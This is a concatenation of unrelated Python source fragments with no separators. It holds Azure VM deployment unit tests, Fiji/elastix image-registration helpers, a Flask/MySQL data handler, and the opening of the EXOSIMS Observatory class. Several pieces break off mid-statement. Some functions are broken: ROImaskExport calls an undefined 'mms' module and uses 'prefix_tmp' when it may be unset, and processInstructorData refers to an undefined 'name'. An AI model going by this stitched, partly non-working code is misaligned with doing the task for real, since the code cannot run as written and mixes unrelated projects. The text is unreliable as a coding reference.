while deploying""" # Arrange resource_model = DeployAzureVMResourceModel() data = Mock() updated_data = Mock() updated_data.vm_credentials = Mock() deployed_app_attributes = Mock() self.deploy_operation._prepare_deploy_data = Mock(return_value=data) self.deploy_operation._create_vm_common_objects = Mock(return_value=updated_data) self.deploy_operation._create_vm_custom_script_extension = Mock() self.deploy_operation._prepare_deployed_app_attributes = 
Mock(return_value=deployed_app_attributes) cancellation_context = Mock() reservation = Mock() cloud_provider_model = Mock() logger = Mock() network_client = Mock() compute_client = Mock() storage_client = Mock() cloudshell_session = Mock() create_vm_action = Mock(side_effect=Exception) self.deploy_operation._rollback_deployed_resources = Mock() # Act with self.assertRaises(Exception): self.deploy_operation._deploy_vm_generic(create_vm_action=create_vm_action, deployment_model=resource_model, cloud_provider_model=cloud_provider_model, reservation=reservation, network_client=network_client, compute_client=compute_client, storage_client=storage_client, cancellation_context=cancellation_context, logger=logger, cloudshell_session=cloudshell_session) # Verify self.deploy_operation._rollback_deployed_resources.assert_called_once_with( compute_client=compute_client, network_client=network_client, group_name=updated_data.group_name, interface_name=updated_data.interface_name, ip_name=updated_data.ip_name, vm_name=updated_data.vm_name, logger=logger) def test_deploy_operation_virtual_networks_validation(self): # todo - add tests for validations pass def test_rollback_deployed_resources(self): """Check that deploy rollback method will delete resources""" self.network_service.delete_nic = Mock() self.network_service.delete_ip = Mock() self.vm_service.delete_vm = Mock() # Act self.deploy_operation._rollback_deployed_resources(compute_client=MagicMock(), network_client=MagicMock(), group_name=MagicMock(), interface_name=MagicMock(), vm_name=MagicMock(), ip_name=MagicMock(), logger=MagicMock()) # Verify self.network_service.delete_nic.assert_called_once() self.network_service.delete_ip.assert_called_once() self.vm_service.delete_vm.assert_called_once() def test_process_nsg_rules(self): """Check that method validates NSG is single per group and uses security group service for rules creation""" group_name = "test_group_name" network_client = MagicMock() azure_vm_deployment_model = MagicMock() nic = MagicMock() cancellation_context = MagicMock() logger = MagicMock() security_groups_list = MagicMock() self.deploy_operation.security_group_service.list_network_security_group.return_value = security_groups_list self.deploy_operation._validate_resource_is_single_per_group = MagicMock() self.deploy_operation.security_group_service.get_network_security_group.return_value = security_groups_list[0] lock = Mock() self.generic_lock_provider.get_resource_lock = Mock(return_value=lock) # Act self.deploy_operation._process_nsg_rules( network_client=network_client, group_name=group_name, azure_vm_deployment_model=azure_vm_deployment_model, nic=nic, cancellation_context=cancellation_context, logger=logger) # Verify self.deploy_operation.security_group_service.get_network_security_group.assert_called_once_with( network_client=network_client, group_name=group_name) self.deploy_operation.security_group_service.create_network_security_group_rules.assert_called_once_with( destination_addr=nic.ip_configurations[0].private_ip_address, group_name=group_name, inbound_rules=[], network_client=network_client, security_group_name=security_groups_list[0].name, lock=lock) def test_process_nsg_rules_inbound_ports_attribute_is_empty(self): """Check that method will not call security group service for NSG rules creation if there are no rules""" group_name = "test_group_name" network_client = MagicMock() azure_vm_deployment_model = MagicMock() nic = MagicMock() cancellation_context = MagicMock() logger = MagicMock() 
self.deploy_operation._validate_resource_is_single_per_group = MagicMock() azure_vm_deployment_model.inbound_ports = "" # Act self.deploy_operation._process_nsg_rules( network_client=network_client, group_name=group_name, azure_vm_deployment_model=azure_vm_deployment_model, nic=nic, cancellation_context=cancellation_context, logger=logger) # Verify self.deploy_operation.security_group_service.list_network_security_group.assert_not_called() self.deploy_operation._validate_resource_is_single_per_group.assert_not_called() self.deploy_operation.security_group_service.create_network_security_group_rules.assert_not_called() def test_validate_resource_is_single_per_group(self): """Check that method will not throw Exception if length of resource list is equal to 1""" group_name = "test_group_name" resource_name = MagicMock() resource_list = [MagicMock()] try: # Act self.deploy_operation._validate_resource_is_single_per_group(resource_list, group_name, resource_name) except Exception as e: # Verify self.fail("Method should not raise any exception. Got: {}: {}".format(type(e), e)) def test_validate_deployment_model_raises_exception(self): """Check that method will raise Exception if "Add Public IP" attr is False and "Inbound Ports" is not empty""" vm_deployment_mode = MagicMock(inbound_ports="80:tcp", add_public_ip=False) with self.assertRaises(Exception): self.deploy_operation._validate_deployment_model(vm_deployment_mode) def test_validate_resource_is_single_per_group_several_resources(self): """Check that method will not throw Exception if length of resource list is more than 1""" group_name = "test_group_name" resource_name = MagicMock() resource_list = [MagicMock(), MagicMock(), MagicMock()] with self.assertRaises(Exception): self.deploy_operation._validate_resource_is_single_per_group(resource_list, group_name, resource_name) def test_validate_resource_is_single_per_group_missing_resource(self): """Check that method will throw Exception if resource list is empty""" group_name = "test_group_name" resource_name = MagicMock() resource_list = [] with self.assertRaises(Exception): self.deploy_operation._validate_resource_is_single_per_group(resource_list, group_name, resource_name) def test_prepare_computer_name_win(self): """ Check that method will use NameProviderService.generate_name to process computer name and correct length is selected based on the OS type """ computer_name = MagicMock() self.name_provider_service.generate_name = Mock(return_value=computer_name) os_type = OperatingSystemTypes.windows postfix = Mock() name = "test_name" # Act res = self.deploy_operation._prepare_computer_name(name=name, postfix=postfix, os_type=os_type) # Verify self.name_provider_service.generate_name.assert_called_once_with(name=name, postfix=postfix, max_length=15) self.assertEqual(res, computer_name) def test_prepare_computer_name_linux(self): """ Check that method will use NameProviderService.generate_name to process computer name and correct length is selected based on the OS type """ computer_name = MagicMock() self.name_provider_service.generate_name = Mock(return_value=computer_name) os_type = OperatingSystemTypes.linux postfix = Mock() name = "test_name" # Act res = self.deploy_operation._prepare_computer_name(name=name, postfix=postfix, os_type=os_type) # Verify self.name_provider_service.generate_name.assert_called_once_with(name=name, postfix=postfix, max_length=64) self.assertEqual(res, computer_name) def test_prepare_vm_size_retrieve_attr_from_deployment_model(self): """Check that method will 
retrieve "vm_size" attribute from deployment model if attr is not empty""" expected_vm_size = MagicMock() cloud_provider_model = MagicMock(vm_size="") azure_vm_deployment_model = MagicMock(vm_size=expected_vm_size) # Act res = self.deploy_operation._prepare_vm_size(azure_vm_deployment_model=azure_vm_deployment_model, cloud_provider_model=cloud_provider_model) # Verify self.assertEqual(res, expected_vm_size) def test_prepare_vm_size_retrieve_default_attr_from_cp_model(self): """Check that method will retrieve "vm_size" attr from
#Image Registration Functions #<NAME> import matplotlib.pyplot as plt import numpy as np import sys import time import os import re import nibabel as nib from pathlib import Path import pandas as pd import shutil import glob import fileinput import cv2 from joblib import Parallel, delayed from numba import njit, prange import subprocess import utils #-----------------General Utility Functions for Registration----------------------- def FormatFijiPointsFromCSV(input_file,selection_type): """This function will take the csv point selection file that you export from using control+m in fiji (ImageJ) to the correct text file format to use with elastix image registration selection_type must be the string 'index' or 'points'""" #Get the current directory tmp_path = Path('..') home_dir=tmp_path.cwd() #Read the csv file that you input data = pd.read_csv(input_file) #Get the image folder name parent=Path(input_file).parent #Change the directory to the parent folder so we know where to export os.chdir(parent) #Remove the file extension prefix=Path(input_file).stem #Rename the first column for ease of access data.rename(columns = {list(data)[0]:'Landmark'}, inplace=True) #Create a new text file txt_file = open(prefix+".txt","w+") #Create first string to write to your file str_list = [str(selection_type),str(max(data['Landmark']))] txt_file.writelines(i + '\n' for i in str_list) #Close and save the txt file txt_file.close() #Get only the data we need for the text file point_tab = data[['X','Y']] #Now append the data table to the txt file point_tab.to_csv(prefix+".txt", header=False, index=False, sep=' ', mode='a') #Change the current directory back to the home directory os.chdir(home_dir) def FormatRegionFromFiji(input_file,selection_type="index"): """This function will take a set of points that you set and export in ImageJ using Analyze > Tools > Save XY coordinates plugin""" #Get the current directory tmp_path = Path('..') home_dir=tmp_path.cwd() #Read the csv file that you input data = pd.read_csv(input_file) #Get the image folder name parent=Path(input_file).parent #Change the directory to the parent folder so we know where to export os.chdir(parent) #Remove the file extension prefix=Path(input_file).stem #Create a new text file txt_file = open(prefix+".txt","w+") #Create first string to write to your file str_list = [str(selection_type),str(data.shape[0])] txt_file.writelines(i + '\n' for i in str_list) #Close and save the txt file txt_file.close() #Get only the data we need for the text file point_tab = data[['X','Y']] #Now append the data table to the txt file point_tab.to_csv(prefix+".txt", header=False, index=False, sep=' ', mode='a') #Change the current directory back to the home directory os.chdir(home_dir) def GetROImask(dir,full_size,ROI_correction = None): """This function will take the check all subdirectories for csv files exported from using Analyze > Tools > Save XY coordinates plugin. It will then create a mask for each of those ROIs based on the full image coordinates so that each region can be extracted efficiently. dir: The directory that you want to do a subdirectory search on for csv files. 
full_image: Full image to use for masking ROI from ROI_correction: correction to be added to the dimensions of the ROI Returns a dictionary object with keys being the folders detected and the values being the masks created based on csv files in folders and the full image Note: We will use this function with ROIs defined on the toluidine blue image and we use it to extract the ROIs from the final registered full MSI UMAP image """ #Get the names of the folders in your directory filenames = [file for file in os.listdir(dir) if os.path.isdir(os.path.join(dir,file))] #Get all csv files in those directories #***Note that we are traversing all directory so may need to change to avoid prblems*** csv_files = utils.TraverseDir(ending="coordinates.csv") #Create a dictionary object for our ROIs that contains the folder names with csv full paths ROI_dict = dict(zip(filenames, csv_files)) #Create a new dictionary object to store the masks and coordinates in ROI_masks = {} #Access the dictionary ROI object to load the mask coordinates from csv files for ROI, filename in ROI_dict.items(): #Read csv file_cont = pd.read_csv(filename) #Get the XY coordinates from the dataframe point_tab = file_cont[['X','Y']] #Create a mask for each of these ROI regions tp_left = (point_tab[['X']].values.min()-1,point_tab[['Y']].values.min()-1) bt_right = (point_tab[['X']].values.max()-1,point_tab[['Y']].values.max()-1) #Create a blank mask - ***Order is 1 and 0 for the nifti image format***** mask = np.zeros(shape=(full_size[1],full_size[0]),dtype="uint8") #Draw rectangle on the mask using opencv cv2.rectangle(img=mask,pt1=tp_left,pt2=bt_right,color=(255,255,255),thickness=-1) #Extract sliced, nonzero regions from your original image nonzero = np.nonzero(mask) minx = min(nonzero[0]) maxx = max(nonzero[0]) miny = min(nonzero[1]) maxy = max(nonzero[1]) #Check to see if we are adding overlap to our ROIs if ROI_correction is not None: print('Detected ROI Correction Factor...') minx = (minx-(ROI_correction)) maxx = (maxx+(ROI_correction)) miny = (miny-(ROI_correction)) maxy = (maxy+(ROI_correction)) #Add the mask in this iteration to our dictionary object ROI_masks.update({str(ROI):[minx,maxx,miny,maxy]}) #Report that the masking is complete print('Finished getting coordinates') #Return the dictionary object return ROI_masks def CreateMaskFromCoords(filenames_list,full_image,invert=False): """Function for reading in ROI coordinates and converting them to a mask. Currently only accepts nifti format for the full_image. 
Option to invert the mask""" #Read the full image full_im = nib.load(str(full_image)).get_fdata().T #Get the full array size full_size=full_im.shape #Create a blank mask - ***Order is 1 and 0 for the nifti image format***** mask = np.zeros(shape=(full_size[0],full_size[1]),dtype="uint8") #Iterate through each ROI csv file for roi in filenames_list: #Read csv file_cont = pd.read_csv(roi) #Get the XY coordinates from the dataframe point_tab = file_cont[['X','Y']] #Create a mask for each of these ROI regions tp_left = (point_tab[['X']].values.min()-1,point_tab[['Y']].values.min()-1) bt_right = (point_tab[['X']].values.max()-1,point_tab[['Y']].values.max()-1) #Draw rectangle on the mask using opencv cv2.rectangle(img=mask,pt1=tp_left,pt2=bt_right,color=(255,255,255),thickness=-1) #Check to see if inverting the mask if invert: mask = ~mask #return the mask return mask def ROImaskExport(ROI_masks,full_img,flip_horz=False,flip_vert=False,prefix=None,export_image=True): """Function for exporting ROIs from an ROI_masks dictionary object that gets returned from GetROImask function ROI_masks: Returned dictionary from GetROImask function full_img: Array that contains the image to be cropped from flip_horz: Logical. If true, ROI is flipped horizontally flip_vert: Logical. If true, ROI is flipped vertically prefix: prefix to add to the ROIs that are exported. If left to None, then a default prefix is added that corresponds to the image folder that the ROI represents""" #Set your home directory tmp = Path('..') home_dir=tmp.cwd() #Create a dictionary of final rescaled sizes to use for MSI ROI Extraction fin_sizes = {} #Loop through the ROI_masks dictionary for ROI,mask in ROI_masks.items(): os.chdir(str(ROI)) #Read the imc image for resizing imc_im=mms.imc_file(tmp.cwd(),return_im=True,return_imc_cell_table=False,return_pix_table=False).image #Get our ROIs tmp_ROI = full_img[int(mask[2]):int(mask[3]),int(mask[0]):int(mask[1])] #Save the new ROI if flip_horz: tmp_ROI = np.flip(tmp_ROI,0) if flip_vert: tmp_ROI = np.flip(tmp_ROI,1) #Get the size of the imc image multiple = int(imc_im.shape[1]/tmp_ROI.shape[0]) #Use the rounded multiple to resize our ROI for image registration HiRes_size = (tmp_ROI.shape[1]*multiple,tmp_ROI.shape[0]*multiple) #Remember that cv2 does the axis in the opposite order as numpy tmp_ROI_HR = cv2.resize(tmp_ROI,HiRes_size) #Create a nifti object and save the image nifti_ROI = nib.Nifti1Image(tmp_ROI_HR, affine=np.eye(4)) #Get a prefix for the image that we are saving if prefix is None: prefix_tmp = str(ROI) else: prefix = prefix if export_image: #Save the ROI nib.save(nifti_ROI,prefix_tmp+'.nii') #Report the finished job print('Finished exporting '+str(ROI)+'...') #Add the final size to our dictionary fin_sizes.update({str(ROI):HiRes_size}) #Change back to the original directory os.chdir(home_dir) #Report the finished export job print('Finsihed export all regions') #Return an object that contains the final size for each H&E ROI so we can apply the #transformix function for each MSI ROI return fin_sizes def ROImaskExport_MSI_Transformix(ROI_masks_from_tolBlue,final_sizes,parameter_files,full_img,flip_horz=False,flip_vert=False,prefix=None): """Function for exporting ROIs from an ROI_masks dictionary object that gets returned from GetROImask function ROI_masks: Returned dictionary from GetROImask function full_img: Array that contains the image to be cropped from flip_horz: Logical. If true, ROI is flipped horizontally flip_vert: Logical. 
If true, ROI is flipped vertically prefix: prefix to add to the ROIs that are exported. If left to None, then a default prefix is added that corresponds to the image folder that the ROI represents""" #Set your home directory tmp = Path('..') home_dir=tmp.cwd() #Loop through the ROI_masks dictionary for ROI,mask in ROI_masks_from_tolBlue.items(): #Create a directory for our ROI and switch to it if not os.path.exists(os.path.join(tmp.cwd(),str(ROI))): os.makedirs(str(ROI)) os.chdir(str(ROI)) #Get our ROIs tmp_ROI = full_img[int(mask[2]):int(mask[3]),int(mask[0]):int(mask[1])] #Save the new ROI if flip_horz: tmp_ROI = np.flip(tmp_ROI,0) if flip_vert: tmp_ROI = np.flip(tmp_ROI,1) #Use the dictionary of ROI final sizes to resize the image HiRes_size = final_sizes[str(ROI)] #Resize the image tmp_ROI_HR = cv2.resize(tmp_ROI,HiRes_size) #Create a nifti object and save the image nifti_ROI = nib.Nifti1Image(tmp_ROI_HR, affine=np.eye(4)) #Get a prefix for the image that we are saving (will come from the loop that indicates m/z slice) prefix = prefix #Save the ROI nib.save(nifti_ROI,prefix+'.nii') #Report the finished job print('Finished exporting original crop for '+str(ROI)+'...') #Run transformix on this particular ROI using the false H&E and H&E registration parameters tmp_imagepath = Path(os.path.join(tmp.cwd(),str(prefix)+'.nii')) #Create a directory to store this slice in within each ROIs folder os.mkdir(str(prefix)) #Create an output directory path (here tmp.cwd() is the ROI folder and prefix
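A hedged illustration of what FormatFijiPointsFromCSV (defined above) writes, using a made-up landmarks.csv containing three Fiji measurements; the output layout (selection type, point count, then space-separated X Y pairs) follows the function's own write logic.

# Hypothetical call; "landmarks.csv" has columns Landmark,X,Y exported with Ctrl+M in Fiji.
FormatFijiPointsFromCSV("ROI_1/landmarks.csv", "index")
# ROI_1/landmarks.txt would then contain, for three landmarks:
#   index
#   3
#   102 240
#   118 255
#   131 270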
# Copyright 2016 The Eyra Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # File author/s: # <NAME> <<EMAIL>> # <NAME> <<EMAIL>> (getRecordingsInfo) from flask_mysqldb import MySQL from MySQLdb import Error as MySQLError import json import os import random from util import log, filename from config import dbConst, RECSURL class DbHandler: def __init__(self, app): # MySQL configurations app.config['MYSQL_HOST'] = dbConst['host'] app.config['MYSQL_USER'] = dbConst['user'] app.config['MYSQL_DB'] = dbConst['db'] app.config['MYSQL_USE_UNICODE'] = dbConst['use_unicode'] app.config['MYSQL_CHARSET'] = dbConst['charset'] self.mysql = MySQL(app) # path to saved recordings self.recordings_path = app.config['MAIN_RECORDINGS_PATH'] # needed to sanitize the dynamic sql creation in insertGeneralData # keep a list of allowed column names for insertions etc. depending on the table (device, isntructor, etc) self.allowedColumnNames = { 'device': [ 'userAgent', 'imei' ], 'instructor': [ 'name', 'email', 'phone', 'address' ], 'speaker': [ 'name', 'deviceImei' ], 'speaker_info': [ 'speakerId', 's_key', 's_value' ] } # generate list of currently valid tokens according to 'valid' column in table token. #self.invalid_token_ids = self.getInvalidTokenIds() # messes up WSGI script for some fucking reason self.invalid_token_ids = None def getInvalidTokenIds(self): """ Returns a list of tokenId's who are marked with valid=FALSE in database. """ cur = self.mysql.connection.cursor() cur.execute('SELECT id FROM token WHERE valid=FALSE') return [row[0] for row in cur.fetchall()] def insertGeneralData(self, name, data, table): """ inserts data into appropriate table name is i.e. 'instructor' and is a representation of the data, for errors and general identification data is a json object whose keys will be used as table column names and those values will be inserted into table returns the id of the newly inserted row or errors in the format dict(msg=id or msg, statusCode=htmlStatusCode) Example: name='device' data = {'imei':245, 'userAgent':'Mozilla'} table = 'device' In which case, this function will insert into device (imei, userAgent) values ('245','Mozilla') and return said rows newly generated id. WARNING: appends the keys of data straight into a python string using % so at least this should be sanitized. Sanitized by a whitelist of allowed keys in self.allowedColumnNames """ keys = [] vals = [] dataId = None try: if isinstance(data, str): data = json.loads(data) for key, val in data.items(): # use data.iteritems() for python 2.7 # allow only keys from the appropriate list in self.allowedColumnNames if key not in self.allowedColumnNames[name]: raise KeyError('Unallowed column name used! Did someone hack the frontend? name: %s' % key) keys.append(key) vals.append(val) data = None # data is untrusted, should not be used unless it's filtered except (KeyError, TypeError, ValueError) as e: msg = '%s data not on correct format, aborting.' 
% name log(msg, e) return dict(msg=msg, statusCode=400) try: # insert into table cur = self.mysql.connection.cursor() # make our query something like (with 4 key/value pairs) # 'INSERT INTO %s (%s, %s, %s, %s) \ # VALUES (%s, %s, %s, %s)', # depending on number of data keys/values queryStr = 'INSERT INTO %s (' queryStrMid = '' # since we can reuse the (%s,%s,...) for i in range(len(keys)): queryStrMid += '%s' if (i != len(keys) - 1): queryStrMid += ', ' queryStr += queryStrMid queryStr += ') ' # input the keys first, because we don't want the '' quotes that cur.execute # automatically puts there queryStr = queryStr % tuple([table] + keys) queryStr += 'VALUES (' queryStr += queryStrMid queryStr += ')' # make the replacement tuple which is set in place of the %s's in the query queryTuple = tuple(vals) cur.execute(queryStr, queryTuple) # get the newly auto generated id # create our query something like # 'SELECT id FROM %s WHERE \ # %s=%s AND %s=%s AND %s=%s AND %s=%s' # but now the order is WHERE key=val AND key1=val1 and so # we have to interleave our lists instead of appending them # to get the correct order interleavedList = [] for i in range(len(keys)): interleavedList.append(keys[i]) # just a hack, because of the quote thing mentioned above # will be replaces with vals in query interleavedList.append('%s') queryStr = 'SELECT id FROM %s WHERE ' for i in range(len(keys)): queryStr += '%s=%s' if (i != len(keys) - 1): queryStr += ' AND ' queryStr = queryStr % tuple([table] + interleavedList) cur.execute(queryStr, queryTuple) # return highest id in case of multiple results (should be the newest entry) dataIds = cur.fetchall() dataId = max([i[0] for i in dataIds]) # fetchall() returns a list of tuples # only commit if we had no exceptions until this point self.mysql.connection.commit() except MySQLError as e: msg = 'Database error.' log(msg, e) return dict(msg=msg, statusCode=500) if dataId is None: msg = 'Couldn\'t get %s id.' % name log(msg) return dict(msg=msg, statusCode=500) else: return dict(msg='{"%sId":' % name + str(dataId) + '}', statusCode=200) def insertSpeakerData(self, speakerData, speakerInfo): """ inserts into both speaker and speaker_info speakerData is the {'name':name[, 'deviceImei':deviceImei]} speakerInfo are the extra info values to insert into speaker_info table, e.g. speakerInfo: {'height':'154', etc.} assumes speaker doesn't exist in database. """ speakerId = None res = self.insertGeneralData('speaker', speakerData, 'speaker') if 'speakerId' in res['msg']: speakerId = json.loads(res['msg'])['speakerId'] else: return res for k, v in speakerInfo.items(): self.insertGeneralData('speaker_info', { 'speakerId':speakerId, 's_key':k, 's_value':v }, 'speaker_info') return res def processInstructorData(self, instructorData): """ instructorData = look at format in the client-server API """ try: if isinstance(instructorData, str): instructorData = json.loads(instructorData) except (ValueError) as e: msg = '%s data not on correct format, aborting.' % name log(msg, e) return dict(msg=msg, statusCode=400) if 'id' in instructorData: # instructor was submitted as an id, see if he exists in database try: cur = self.mysql.connection.cursor() cur.execute('SELECT id FROM instructor WHERE id=%s', (instructorData['id'],)) # have to pass in a tuple, with only one parameter instructorId = cur.fetchone() if (instructorId is None): # no instructor msg = 'No instructor with that id.' 
log(msg) return dict(msg=msg, statusCode=400) else: # instructor already exists, return it instructorId = instructorId[0] # fetchone returns tuple on success return dict(msg='{"instructorId":' + str(instructorId) + '}', statusCode=200) except MySQLError as e: msg = 'Database error.' log(msg, e) return dict(msg=msg, statusCode=500) return 'Unexpected error.', 500 return self.insertGeneralData('instructor', instructorData, 'instructor') def processDeviceData(self, deviceData): # we have to make sure not to insert device with same IMEI # as is already in the database if so. Otherwise, we create new device deviceImei, deviceId, userAgent = None, None, None try: if isinstance(deviceData, str): deviceData = json.loads(deviceData) userAgent = deviceData['userAgent'] except (TypeError, ValueError, KeyError) as e: msg = 'Device data not on correct format, aborting.' log(msg, e) return dict(msg=msg, statusCode=400) try: deviceImei = deviceData['imei'] except (KeyError) as e: # we don't care if device has no ['imei'] pass try: deviceId = deviceData['deviceId'] del deviceData['deviceId'] # delete it, we don't want to insert it into database except (KeyError) as e: # we don't care if device has no ['deviceId'] pass if deviceImei is not None and deviceImei != '': try: cur = self.mysql.connection.cursor() # firstly, check if this device already exists, if so, update end time, otherwise add device cur.execute('SELECT id FROM device WHERE imei=%s', (deviceImei,)) # have to pass in a tuple, with only one parameter dbDeviceId = cur.fetchone() if (dbDeviceId is None): # no device with this imei in database, insert it return self.insertGeneralData('device', deviceData, 'device') else: # device already exists, return it dbDeviceId = dbDeviceId[0] # fetchone returns tuple on success return dict(msg='{"deviceId":' + str(dbDeviceId) + '}', statusCode=200) except MySQLError as e: msg = 'Database error.' log(msg, e) return dict(msg=msg, statusCode=500) # no imei present, won't be able to identify device unless he has his id if deviceId
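A short usage sketch of DbHandler.insertGeneralData, reusing the example values from its own docstring; `db` is an assumed DbHandler instance running inside a Flask application context.

# Only keys whitelisted in allowedColumnNames['device'] are accepted; on success the
# returned msg is a JSON string such as '{"deviceId":42}'.
res = db.insertGeneralData('device', {'imei': '245', 'userAgent': 'Mozilla'}, 'device')
if res['statusCode'] == 200:
    device_id = json.loads(res['msg'])['deviceId']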
<reponame>semaphoreP/EXOSIMS<gh_stars>0 # -*- coding: utf-8 -*- from EXOSIMS.util.vprint import vprint from EXOSIMS.util.eccanom import eccanom from EXOSIMS.util.get_dirs import get_cache_dir from EXOSIMS.util.get_dirs import get_downloads_dir import numpy as np import astropy.units as u import astropy.constants as const from astropy.time import Time try: import cPickle as pickle except: import pickle import hashlib import os import urllib class Observatory(object): """Observatory class template This class contains all variables and methods necessary to perform Observatory Definition Module calculations in exoplanet mission simulation. Args: \*\*specs: user specified values spkpath (str): Path to SPK file on disk (Defaults to de432s.bsp). Attributes: koAngleMin (astropy Quantity): Telescope minimum keepout angle in units of deg koAngleMinMoon (astropy Quantity): Telescope minimum keepout angle in units of deg, for the Moon only koAngleMinEarth (astropy Quantity): Telescope minimum keepout angle in units of deg, for the Earth only koAngleMax (astropy Quantity): Telescope maximum keepout angle (for occulter) in units of deg koAngleSmall (astropy Quantity): Telescope keepout angle for smaller (angular size) bodies in units of deg settlingTime (astropy Quantity): Instrument settling time after repoint in units of day thrust (astropy Quantity): Occulter slew thrust in units of mN slewIsp (astropy Quantity): Occulter slew specific impulse in units of s scMass (astropy Quantity): Occulter (maneuvering sc) wet mass in units of kg dryMass (astropy Quantity): Occulter (maneuvering sc) dry mass in units of kg coMass (astropy Quantity): Telescope (non-maneuvering sc) mass in units of kg occulterSep (astropy Quantity): Occulter-telescope distance in units of km skIsp (astropy Quantity): Station-keeping specific impulse in units of s defburnPortion (float): Default burn portion flowRate (astropy Quantity): Slew flow rate in units of kg/day checkKeepoutEnd (boolean): Boolean signifying if the keepout method must be called at the end of each observation forceStaticEphem (boolean): Boolean used to force static ephemerides constTOF (astropy Quantity 1x1 ndarray): Constant time of flight for single occulter slew in units of day maxdVpct (float): Maximum percentage of total on board fuel used for single starshade slew cachedir (str): Path to cache directory Notes: For finding positions of solar system bodies, this routine will attempt to use the jplephem module and a local SPK file on disk. The module can be installed via pip or from source. The default SPK file can be downloaded from here: http://naif.jpl.nasa.gov/pub/naif/generic_kernels/spk/planets/de432s.bsp and should be placed in the Observatory subdirectory of EXOSIMS. """ _modtype = 'Observatory' def __init__(self, koAngleMin=45, koAngleMinMoon=None, koAngleMinEarth=None, koAngleMax=None, koAngleSmall=1, ko_dtStep=1, settlingTime=1, thrust=450, slewIsp=4160, scMass=6000, dryMass=3400, coMass=5800, occulterSep=55000, skIsp=220, defburnPortion=0.05, constTOF=14, maxdVpct=0.02, spkpath=None, checkKeepoutEnd=True, forceStaticEphem=False, occ_dtmin=10, occ_dtmax=61, cachedir=None, **specs): #start the outspec self._outspec = {} # load the vprint function (same line in all prototype module constructors) self.vprint = vprint(specs.get('verbose', True)) # validate inputs assert isinstance(checkKeepoutEnd, bool), "checkKeepoutEnd must be a boolean." assert isinstance(forceStaticEphem, bool), "forceStaticEphem must be a boolean." 
# default Observatory values self.koAngleMin = koAngleMin*u.deg # keepout minimum angle koAngleMinMoon = koAngleMin if koAngleMinMoon is None else koAngleMinMoon self.koAngleMinMoon = koAngleMinMoon*u.deg # keepout minimum angle: Moon-only koAngleMinEarth = koAngleMin if koAngleMinEarth is None else koAngleMinEarth self.koAngleMinEarth = koAngleMinEarth*u.deg# keepout minimum angle: Earth-only self.koAngleMax = koAngleMax*u.deg if koAngleMax is not None else koAngleMax # keepout maximum angle (occulter) self.koAngleSmall = koAngleSmall*u.deg # keepout angle for smaller bodies self.ko_dtStep = ko_dtStep*u.d # time step for generating koMap of stars (day) self.settlingTime = settlingTime*u.d # instru. settling time after repoint self.thrust = thrust*u.mN # occulter slew thrust (mN) self.slewIsp = slewIsp*u.s # occulter slew specific impulse (s) self.scMass = scMass*u.kg # occulter initial (wet) mass (kg) self.dryMass = dryMass*u.kg # occulter dry mass (kg) self.coMass = coMass*u.kg # telescope mass (kg) self.occulterSep = occulterSep*u.km # occulter-telescope distance (km) self.skIsp = skIsp*u.s # station-keeping Isp (s) self.defburnPortion = float(defburnPortion) # default burn portion self.checkKeepoutEnd = bool(checkKeepoutEnd)# true if keepout called at obs end self.forceStaticEphem = bool(forceStaticEphem)# boolean used to force static ephem self.constTOF = np.array([constTOF])*u.d # starshade constant slew time (days) self.occ_dtmin = occ_dtmin*u.d # Minimum occulter slew time (days) self.occ_dtmax = occ_dtmax*u.d # Maximum occulter slew time (days) self.maxdVpct = maxdVpct # Maximum deltaV percent # find the cache directory self.cachedir = get_cache_dir(cachedir) # find amount of fuel on board starshade and an upper bound for single slew dV self.dVtot = self.slewIsp*const.g0*np.log(self.scMass/self.dryMass) self.dVmax = self.dVtot * self.maxdVpct # set values derived from quantities above # slew flow rate (kg/day) self.flowRate = (self.thrust/const.g0/self.slewIsp).to('kg/day') # if jplephem is available, we'll use that for propagating solar system bodies # otherwise, use static ephemerides if self.forceStaticEphem is False: try: from jplephem.spk import SPK self.havejplephem = True except ImportError: self.vprint("WARNING: Module jplephem not found, " \ + "using static solar system ephemerides.") self.havejplephem = False else: self.havejplephem = False self.vprint("Using static solar system ephemerides.") # populate outspec for att in self.__dict__.keys(): if att not in ['vprint','_outspec']: dat = self.__dict__[att] self._outspec[att] = dat.value if isinstance(dat, u.Quantity) else dat # define function for calculating obliquity of the ecliptic # (arg Julian centuries from J2000) self.obe = lambda TDB: 23.439279 - 0.0130102*TDB - 5.086e-8*(TDB**2) + \ 5.565e-7*(TDB**3) + 1.6e-10*(TDB**4) + 1.21e-11*(TDB**5) # if you have jplephem, load spice file, otherwise load static ephem if self.havejplephem: if (spkpath is None) or not(os.path.exists(spkpath)): # if the path does not exist, load the default de432s.bsp filename = 'de432s.bsp' downloadsdir = get_downloads_dir() spkpath = os.path.join(downloadsdir, filename) # attempt to fetch ephemeris and cache locally in $Home/.EXOSIMS/downloads/ if not os.path.exists(spkpath) and os.access(downloadsdir, os.W_OK|os.X_OK): spk_on_web = 'https://naif.jpl.nasa.gov/pub/naif/generic_kernels/spk/planets/de432s.bsp' self.vprint("Fetching planetary ephemeris from %s to %s" % (spk_on_web, spkpath)) try: urllib.urlretrieve(spk_on_web, spkpath) except: # 
Note: the SPK.open() below will fail in this case self.vprint("Error: Remote fetch failed. Fetch manually or see install instructions.") self.kernel = SPK.open(spkpath) else: """All ephemeride data from Vallado Appendix D.4 Values are: a = sma (AU), e = eccentricity, I = inclination (deg), O = long. ascending node (deg), w = long. perihelion (deg), lM = mean longitude (deg) """ # store ephemerides data in heliocentric true ecliptic frame a = 0.387098310 e = [0.20563175, 0.000020406, -0.0000000284, -0.00000000017] I = [7.004986, -0.0059516, 0.00000081, 0.000000041] O = [48.330893, -0.1254229, -0.00008833, -0.000000196] w = [77.456119, 0.1588643, -0.00001343, 0.000000039] lM = [252.250906, 149472.6746358, -0.00000535, 0.000000002] Mercury = self.SolarEph(a, e, I, O, w, lM) a = 0.723329820 e = [0.00677188, -0.000047766, 0.0000000975, 0.00000000044] I = [3.394662, -0.0008568, -0.00003244, 0.000000010] O = [76.679920, -0.2780080, -0.00014256, -0.000000198] w = [131.563707, 0.0048646, -0.00138232, -0.000005332] lM = [181.979801, 58517.8156760, 0.00000165, -0.000000002] Venus = self.SolarEph(a, e, I, O, w, lM) a = 1.000001018 e = [0.01670862, 